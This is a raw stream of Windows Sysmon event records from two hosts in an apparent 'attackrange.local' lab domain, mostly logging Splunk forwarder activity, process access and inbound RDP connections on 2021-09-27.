09:01:45.171{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8879-6151-ED79-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8879-6151-ED79-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.166{5EBD8912-8879-6151-ED79-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.149{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D359D5845C0B0ADE31F905F6CEF2E3FD,SHA256=60EB780F916E3896EECB026088FC10940B9BC2EE1312D54912D01BF85A9B81DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:41.975{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63908-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:41.718{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59262-false10.0.1.12-8000- 23542300x8000000000000000976631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:45.652{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A110EA0420DBFBAE57BEC761AEC03C5,SHA256=2631278FBD739AD3F6D20D7FD90FA3D10B42B01F74E1F9984EB1EDA0561C21A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:45.230{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEA5C8080B5089F6BE9BD9506E266DF5,SHA256=8A3320CCE078F0CCB9D5AFE10409EC339D872EC161D0681BF7BD3C83FB941A00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:43.846{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-45270-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:46.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861171C93C0F0B20E031690C0220084E,SHA256=BEFBE316B4AAF5A4C3023CE6C7F70A1F36A52F4F1AFF834714618D4F1FBC41C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:46.787{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E59765B6B9162AE1DCD2BBF49A20E3DA,SHA256=00F17D1FC7994525E453DF79ABE1AAB17208420D07FF7593F5D38E36B7D39941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:46.150{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93F41F4853038738AAFB148DBDF19916,SHA256=7AE008523B88CF991051DD3BBC08E9B3805FBA526CB1B90FEB3D8C33C8748279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:47.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7890BBCDB2D64CDBAB5EE31BCB8473B,SHA256=C671B658D636CD3CFE77DAEF8D6B0E110419A9B8E21436F6412CAF1349C25FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:47.168{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970CFF58DE48BAF1A2CA8BA023B5C1B5,SHA256=90F4FAEFE143C40F3D41DF90D87B710D4E64962B93A9DE722DA8CCE7F44E9AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:48.389{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4298MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:48.247{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A8FAE493231A97B5B0808BF398AC15,SHA256=1B6315673D0B5A5E611F659F52D00D4DD056A0B9A7CC5898B7ABACB2E90ED32F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:48.186{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAC17359E3EEAF8C457E1866E576D98,SHA256=2DEBA01571B672D4BF39EC6D1A9E101AF24DF8D7793321EF355B4247BE107274,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:47.724{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:49.202{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04ACF9920BF169A02F0475B679D2F6E8,SHA256=7F2844595FC94EA8526D84E6E7C0BDE41935947DF6B761FFCD57598001BD1E8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:46.828{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59263-false10.0.1.12-8000- 354300x8000000000000000976642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:46.568{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-56814-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:49.403{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4299MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:49.261{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96CA5FE3D134736CB3DCAD8238E7D5BE,SHA256=95E0C4ED4EAECF9DF9AAAE2396366D7745F9B120605124B720D93ED2DB5CA2BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:49.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=47003943220F7E1CBF0E1732344BFFBD,SHA256=635C40C9A738EE224888CFC3474D78E82DADABF43A4FDED1142677EEE0E07524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:50.217{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F5D495181199194F1228458F006289,SHA256=8A25A164885E264399F3E239B9E04659A0625339DA880518D135F9665605BBAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:50.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4891138B3178F75C7AA5E5BA32DA996,SHA256=F52DF8F72649A9AF21883FF3FFB80996B79242F75B905208D5EA7B7983056EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:51.857{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC51382457BB18613440FCFA80271B59,SHA256=0A1ABA4582C8214F8D12272474227B0834A64B961354923642616C0720102B82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:51.278{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=739A1B0AFEA13A00A7966E68E75FF8AD,SHA256=D4A6CFB7E6B98A5DF0D0FA56578630FF3F5D554B7310A06832A39303AC133390,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:49.616{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de64985-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:51.417{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:51.218{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A12F049D3F7C59B299D1AACA46063FE,SHA256=05C1F5254742464A029AA2B2333AE0C838DA3682381334ED6CBBCBE7DDA14EF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:48.012{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de56987-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:50.993{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52545-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:52.388{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59BC53B422841249A2E5CDBAFEE51D18,SHA256=7802A86E6CAA90F5976AD896B593FE574DE5A59F14626D86BDDD4E62CCEC794E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:52.388{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF667FD4782AEC814E62FCB794AF70DC,SHA256=FE3551762D2291D10BC19236A999ECEFAE4413C76A5A250A4542BDD8152EAD33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:52.220{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E01E03663982C43789728FE40707300,SHA256=01DC9F8A5897240DD978A77B52FF16F24C271966AD0F3E028ACD0B043C269092,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:52.278{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C1720F661317DACA51447261837244,SHA256=D30A72EE9A18DCE4E025F8E4E01D9B6CACDB48A0D54047E3BCF7BCA4F572A86B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:49.148{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-23488-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:53.518{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59BC53B422841249A2E5CDBAFEE51D18,SHA256=7802A86E6CAA90F5976AD896B593FE574DE5A59F14626D86BDDD4E62CCEC794E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:53.234{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1F2ED6EE901EFABB0167891511D5FC,SHA256=DDC386CEAB063D75619FC0CD1CDE65B187D8512EAADCE6663BC0BAC548EEDB5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:53.294{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41FC3BCB6D8A5DE02E74E378D0AB869E,SHA256=8C0DA36CC1225A1805D20D3125A3FF6D2BFB9F7C05CEE4F0AFF57C5DDA87E69E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:54.294{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98BDB81E46CB228BF16E2547EAAFE8D5,SHA256=FA3C7CF74D5DC2F249C1D8BF7B2F6FA9943BDA50752B55FDD368288E0A0EEFC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:51.038{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-34351-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001048080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.909{5EBD8912-8882-6151-F079-00000000FC01}70966628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8882-6151-F079-00000000FC01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:54.724{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 